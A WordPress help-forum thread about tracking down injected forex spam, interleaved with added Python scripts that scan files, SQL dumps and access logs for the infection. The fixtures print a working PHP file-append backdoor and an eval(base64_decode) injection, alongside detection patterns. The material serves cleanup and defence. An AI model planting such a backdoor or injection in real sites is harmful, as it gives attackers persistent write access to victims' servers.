
Hacked: I can't find these Spam links anywhere? Plus more spam advice? (17 posts)

  1. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK...I just keep getting pummeled by spam links. Usually in the footer, but this is new. If you view my source code on http://www.rvoodoo.com, just after the opening body tag, you will see a bunch of links to forex stuff. Thing is, I can't find that anywhere. Any ideas where it's coming from? I've looked at my header file where that would be situated, nothing there. I've turned off all plugins and refreshed browser, hidden links are still there. I have all fresh WP files, and the date stamps are all in check (except my wp-config file was hit yesterday, but that's clean now).

    And on the spam topic, I've followed a bunch of the posts on here, I'm running 2.8.4, since it was released. I changed all passwords. No hidden admin users in the sql db. My theme files (at least the ones being written to) are read only, and clean. I've done a full fresh WP install, reuploaded all fresh plugins, scanned my sql db for base64 and other things and cleaned them....Am I missing something? I still keep coming back to footer spam every day.

    I think this is the first time I've had to come on here and beg for some help, I usually google myself to death to find my answers.....but I'm plain stumped this time.....

  2. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK, I finally found the code that was sticking that spam near my header.

    But with that out of the way, can anyone see anything I missed in cleaning my WP install? This is kind of driving me nuts.

  3. bottleneck
    Member
    Posted 4 years ago #

    IMHO, it looks to me like brute-force password discovery.

    Make sure that you don't use "admin" as your username.

    Also, just in case, check this out 20+ Powerful WordPress Security Plugins and Some Tips and Tricks

  4. sisconda
    Member
    Posted 4 years ago #

    If you don't mind me asking, where did you go to remove the forex links. The exact same thing has happened to a blog of mine. Thanks!

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    I don't use admin, and I've changed my passwords.... all using mixed case and numbers combined.....

    @sisconda.....I'm not 100% sure which trick worked. What I've done today is scan every php file I have. In my main WP directory was an index.php that had nasty stuff in it.

    BUT....I spent about 8hrs today going through all 4 of my WP installs, along with every website I have (9 I think), every php file on every website had a base64 decode inserted at the top of it.

    I really hope I got it all this time

  6. Samuel B
    moderator
    Posted 4 years ago #

    To be sure, you should export your database and do a search on the .sql file with Notepad for "forex", "eval", "Base", etc.

  7. sisconda
    Member
    Posted 4 years ago #

    Ahh thanks, I'll go take a look through all the files then. I noticed the base64 decode function on the top of a lot of the pages, but I wasn't sure if it had some built in information that WordPress needed.

    The funny thing is, I wouldn't even have found any of it but it looks like it has a misplaced semicolon in it which broke some of my js functions.

    Thanks again!

  8. lukeodom
    Member
    Posted 4 years ago #

    Same thing just happened to my site. Latest version of wordpress. Don't use admin. Do I just remove the base64 from the top of my php files? How do I keep it from happening again?

  9. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    well...I just finished up. I had forgotten about replacing all the plugins on some of my other wordpress installs. There's literally a couple thousand php files I had to work on between yesterday and today. I replaced most of them, and for some I just hand-removed the offending base64 junk. I had to guess on a lot of the php files, which I could replace and which I had to edit. I think I got everything right except maybe my zencart shop.....which doesn't seem to be totally working properly....

    @lukeodom, you can delete the entire base64 function....I forget what it looks like but it's inside <> brackets. It's probably a pretty big paragraph; delete the whole thing, just be sure not to get any part of the next function......

    To keep it from happening again, you need to clean everything, change all your passwords, upgrade any WP installs to latest, etc. There are quite a few posts in the forums about dealing with hacked WP installs; that's what I referenced.

  10. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    OK, I think I figured out my situation. Since I had been using the latest version of WP I was really stumped. Then I started digging into the forums of the other software I use, and stumbled on a discussion on the simplemachines.org forum, which is the forum software I use. Seems a lot of users over there had the base64_decode show up on ALL their php files just like I did. They tracked it down to a user with the name krisbarteo. I checked out my forum, and sure enough, I had that user. So I'm not even sure my problems stem from WP.

    Just to be sure, I followed the advice given for both WP, and SimpleMachines....hopefully both are safe for now....

  11. bottleneck
    Member
    Posted 4 years ago #

    Sorry to hear this...

    did you scan your local machine?

  12. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Yup...it's actually a really fresh reformat.....so super clean machine. Scanned again last night. It is clean.

  13. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    damn, had to unresolve this topic, because the footer spam is back.

    None of my other php files are hit this time, just the footer. My host says it is a compromised FTP password. But....I changed that, then cleaned everything, and changed it again. I don't see how that can be the issue

  14. whooami
    Member
    Posted 4 years ago #

    "I don't see how that can be the issue"

    Of course you don't -- I'm not surprised.

    Does your host offer FTP logs? Before uploading a bunch of files on your own IP, take a look at the FTP logs.

  15. burzyn
    Member
    Posted 4 years ago #

    RVoodoo, I have the same problem. Could you tell me where I can find this spam code in my WordPress files?

  16. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    like I said above, all my php files had base64 inserted into them; also, I found 2 php files that were not part of any software I was using.

    If you find anything in WP php files that uses base64 decode commands, I'd be really suspicious of it.

    If you have stuff like that, you'll most likely need a full reinstall like I did
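    Posts 5, 9 and 16 describe the same fingerprint: an eval(base64_decode(...)) block prepended to the top of every .php file, plus a couple of .php files that belong to no installed software, and post 6 adds grepping the exported SQL dump for "forex", "eval" and "base". The following is an added example, not code from this thread or from WordPress, of how to triage a docroot for exactly those things: flag files whose head carries an obfuscated eval and decode the payload so you can see what it does, list .php files that are not in a manifest of a fresh download, and grep a dump. The directory layout, the KNOWN_FILES manifest, the dropper, the dump and the spam payload are all constructed for the demo.

```python
import os
import re
import base64
import tempfile

# Obfuscation wrappers that essentially never appear in the head of a legitimate
# WordPress or plugin file but are the signature of the injection in this thread.
INJECT_RE = re.compile(
    rb"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Capture the literal base64 argument so the payload can be decoded and inspected.
B64_ARG_RE = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]")
HEAD_BYTES = 4096  # the injections described in the thread sit at the very top of each file


def scan_file(path):
    """Return a finding dict if the head of `path` carries an obfuscated eval, else None."""
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES)
    m = INJECT_RE.search(head)
    if not m:
        return None
    finding = {"path": path, "pattern": m.group(0).decode("latin-1"), "decoded": None}
    b = B64_ARG_RE.search(head)
    if b:
        try:
            finding["decoded"] = base64.b64decode(b.group(1)).decode("latin-1", "replace")
        except ValueError:  # not valid base64 after all; keep just the raw match
            pass
    return finding


def scan_tree(root, known_files=None):
    """Walk `root` and return (injected, unknown).

    injected: findings for .php files whose head matches INJECT_RE
    unknown:  .php files not listed in `known_files` (relative paths from a fresh
              install), i.e. files that belong to no software you installed.
    """
    injected, unknown = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            f = scan_file(full)
            if f:
                f["path"] = rel
                injected.append(f)
            if known_files is not None and rel not in known_files:
                unknown.append(rel)
    return sorted(injected, key=lambda f: f["path"]), sorted(unknown)


def grep_dump(path, needles=(b"forex", b"eval(", b"base64_decode")):
    """Samuel B's check: search an exported .sql dump for suspicious strings.
    Returns a list of (line_number, needle) hits, case-insensitive."""
    hits = []
    with open(path, "rb") as fh:
        for n, line in enumerate(fh, 1):
            low = line.lower()
            hits.extend((n, needle.decode()) for needle in needles if needle in low)
    return hits


# --- constructed fixture: a tiny fake docroot, not a real site ---------------
KNOWN_FILES = {"index.php", "wp-includes/functions.php"}  # stand-in for a fresh-download manifest


def build_sample_tree():
    root = tempfile.mkdtemp(prefix="wp-scan-")
    spam = b"echo '<a href=\"http://example.com/forex\">forex</a>';"  # constructed payload
    files = {
        # legitimate file with the injection prepended, as in posts 5 and 9
        "index.php": b'<?php eval(base64_decode("' + base64.b64encode(spam) + b'")); ?>\n'
                     b"<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php');\n",
        "wp-includes/functions.php": b"<?php function wp_something() { return 1; }\n",
        # a dropper belonging to no software: appends POSTed data to the file named by ?f=
        "wp-content/uploads/2007/03/wp-inclode.php":
            b"<?php if (isset($_GET['f'])) file_put_contents($_GET['f'], $_POST['c'], FILE_APPEND);\n",
        "backup.sql": b"INSERT INTO wp_options VALUES (1,'siteurl','http://example.com','yes');\n"
                      b"INSERT INTO wp_posts VALUES (7,'<a href=\"http://example.net/forex\">buy</a>');\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root


def demo():
    root = build_sample_tree()
    injected, unknown = scan_tree(root, KNOWN_FILES)
    return injected, unknown, grep_dump(os.path.join(root, "backup.sql"))


if __name__ == "__main__":
    injected, unknown, dump_hits = demo()
    for f in injected:
        print("INJECTED", f["path"], "->", (f["decoded"] or f["pattern"])[:60])
    for p in unknown:
        print("UNKNOWN ", p)
    for n, needle in dump_hits:
        print("DUMP line", n, "contains", needle)
```

    On the host itself, `grep -rl 'eval(base64_decode' --include='*.php' .` does the first job and `diff -r` against a freshly downloaded WordPress does the second; the point of the manifest check is that a file like wp-inclode.php carries no eval and no base64 at all, so a pattern scan alone never finds the dropper that re-infects the site.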

  17. Gonebeta
    Member
    Posted 4 years ago #

    Hey Guys! I had the same problem for 2 months!

    Did everything suggested but the idiots kept coming back. Thank God for Whooami who suggested looking at the ftp log! Well...I didn't find anything in the ftp log... but behold! They were all in my access log!

    This is how I found him: I opened my access log for the day (opened it in WordPad) and did a search for header.php (in your case you should search for footer.php). I found only two IP addresses that accessed that file in the last two hours. Here is what it looks like:
    ...
    66.36.246.108 - - [27/Dec/2009:14:48:34 -0500] "POST /wp-content/uploads/2007/03/wp-inclode.php?f=/homepages/18/ddd/htdocs/mydomain name/wp-content/themes/my theme name/header.php HTTP/1.1" 200 133 http://www.mydomain.com "-" "-" "-"

    They uploaded two files 4 months ago: wp-inclode.php and fotter.php, with some code in them.

    I went back and checked the access log for the last two days and found the same pattern (with a different IP), always looking for the same files. The time of access corresponds to the time the links show up on my site (about every 4 hours).

    Funny thing is that after they inject the code, the same IP address comes back as a Google bot to check if it is working.

    66.36.246.108 - - [27/Dec/2009:14:48:39 -0500] "GET / HTTP/1.1" 200 41547 http://www.mydomainname .com "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

    Bottom line, search for the file name in your access log, find the path to the rogue files and delete them!

    Hope that helps!

    p.s. Sorry for my bad English
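    Gonebeta's access-log search above, as an added example that is not the poster's own code: parse the log, flag any request for a .php file under /wp-content/uploads/ (PHP should never execute there), pull out query-string values that are server paths to theme files (the f= parameter that tells the dropper which file to append to), and catch the follow-up visit where the same IP returns within a few minutes claiming to be Googlebot. It assumes the standard Apache "combined" log format rather than the host-specific variant shown in the post, and the log lines, paths and IP addresses are constructed (documentation ranges, not the address in the post).

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format (assumed). The post's host logs a variant with an
# unquoted referer; adjust LOG_RE to match your own log before trusting the output.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Nothing under uploads/ should ever be a PHP script; a hit here is a dropper or backdoor.
UPLOADS_PHP_RE = re.compile(r"^/wp-content/uploads/.*\.php$", re.IGNORECASE)
# A query value that is an absolute server path to a .php file: the file being injected into.
PATH_PARAM_RE = re.compile(r"^/.*\.php$", re.IGNORECASE)
BOT_WINDOW = timedelta(minutes=10)  # how soon after the injection the "Googlebot" check arrives

# Constructed sample log, modelled on the pattern described in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Dec/2009:14:48:34 -0500] "POST /wp-content/uploads/2007/03/wp-inclode.php'
    '?f=/home/user/htdocs/wp-content/themes/mytheme/header.php HTTP/1.1" 200 133 "-" "-"',
    '203.0.113.7 - - [27/Dec/2009:14:48:39 -0500] "GET / HTTP/1.1" 200 41547 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.22 - - [27/Dec/2009:15:02:10 -0500] "GET /wp-content/uploads/2009/12/photo.jpg HTTP/1.1" '
    '200 8832 "http://www.example.com/" "Mozilla/5.0"',
    '198.51.100.22 - - [27/Dec/2009:15:02:11 -0500] "GET /wp-content/themes/mytheme/style.css HTTP/1.1" '
    '200 1200 "http://www.example.com/" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Dec/2009:18:50:01 -0500] "POST /wp-content/uploads/2007/03/wp-inclode.php'
    '?f=/home/user/htdocs/wp-content/themes/mytheme/footer.php HTTP/1.1" 200 133 "-" "-"',
    # a crawler claiming Googlebot with no prior hit on the dropper: not flagged by this heuristic
    '192.0.2.50 - - [27/Dec/2009:19:00:00 -0500] "GET / HTTP/1.1" 200 41547 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def analyze(lines):
    """Return rogue-script requests, the files they target, and IPs faking Googlebot afterwards."""
    recs = [r for r in (parse_line(l) for l in lines) if r]
    rogue, targeted, first_rogue_hit = [], set(), {}
    for r in recs:
        if UPLOADS_PHP_RE.match(r["path"]):
            rogue.append((r["ip"], r["time"].isoformat(), r["path"]))
            first_rogue_hit.setdefault(r["ip"], r["time"])
            for values in r["query"].values():
                targeted.update(v for v in values if PATH_PARAM_RE.match(v))
    fake_bots = set()
    for r in recs:
        t0 = first_rogue_hit.get(r["ip"])
        if t0 and "googlebot" in r["ua"].lower() and t0 <= r["time"] <= t0 + BOT_WINDOW:
            fake_bots.add(r["ip"])
    return {
        "rogue_requests": rogue,
        "targeted_files": sorted(targeted),
        "fake_googlebot_ips": sorted(fake_bots),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, when, path in result["rogue_requests"]:
        print("ROGUE SCRIPT", when, ip, path)
    for path in result["targeted_files"]:
        print("FILE BEING INJECTED", path)
    for ip in result["fake_googlebot_ips"]:
        print("FAKE GOOGLEBOT", ip)
```

    The Googlebot check is only a correlation heuristic: a genuine crawler is verified by reverse DNS of the client IP resolving under googlebot.com and forward-resolving back to the same address, which cannot be done offline. The durable fix is the one the post reaches anyway: delete the dropper and the file it was writing to, and block PHP execution under wp-content/uploads at the web server so a re-upload cannot run.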

Topic Closed
